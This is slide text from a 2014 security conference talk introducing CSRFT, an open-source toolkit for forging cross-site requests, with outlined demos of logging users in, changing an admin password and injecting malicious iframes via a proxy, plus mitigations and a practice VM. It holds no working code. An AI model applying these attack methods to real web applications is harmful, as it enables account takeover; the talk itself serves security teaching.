CSRFT

A Cross Site Request Forgeries Toolkit


BSides London - 29th April 2014



Paul AMAR


What is this talk about?


  • (Quick) Recap about CSRF attacks
  • Presentation of the tool
  • Demos 
  • Issues in Web architecture
  • Mitigation
  • Little surprise


Slides available here: paulsec.github.io/bsides-london-2014/


    Who am i? 


    • (French) Student, M. Sc in Computer Science
    • Passionate about (Web) Security
    • Open source developer


    Twitter: @PaulWebSec

    Github: PaulSec                 


    CSRF Recap


                             Fig. Exploitation of CSRF vulnerability


    Why csrft?


    I wanted something:                       

    • Lightweight
    • Cross-platform
    • Open Source
    • Can combine CSRF attacks


    There was no toolkit for this...


    how does it work?


                                                        Fig. Usage of CSRFT


    how is it made ?


    • HTTP Server developed in Node.js

    • Can fake either GET/POST Requests
      • Creates payloads (forms) on-the-fly

    • Client/Server side full JavaScript
      • Communication in JSON


    MORE features


    • Can create scenarios
      • By combining CSRF flaws

    • 2 attack methods possible
      • Special value (craft specific payload)
        Eg. Change user's password
      • Dictionary attacks
        Eg. Try to log the user in


    Additional tools


    • JavaScript Proxy 

    Tampers with requests, injects Web page with malicious iframe

    Inspired by Chema Alonso and his talk:

    Owning Bad Guys {And Mafia} With Javascript Botnets  @ Defcon 20

    • Python utility

    Command-line tool that automates usage




    Time for some demos?


    DEMO (1/2)


    Custom Scenario

    1. Try to attempt to log the user in
    2. Send some malicious payloads
    3. Log the user out


    Completely transparent attack


    Demo (2/2)


    Demo using automated tool


                        Automated attack with the Python (command-line) Utility
                        Send a crafted request to change admin's password


    bad design in web app (1/2)


                                                                          No token in login form

                                                                             the rest of the application
                                                                   can then be targeted


    bad design in web app (2/2)


                                                                               No token to change password

                                                                           Vulnerable if weak credentials


    Mitigation


    • Request Token
      • Random generated token
      • Verified on server-side
      • One of the most-used mechanisms

    • Re-Authentication
      • If weak password? ... Not good!

    • Captcha, Timeout, NoScript (with) ABE


    SURPRISE?


    • Created a (vulnerable) VM
    • Will be hosted on VulnHub
    • Must exploit CSRF flaws to get root access..


    Good luck!




    Questions ?


    Code available here: https://github.com/PaulSec/CSRFT/

    Made with Slides.com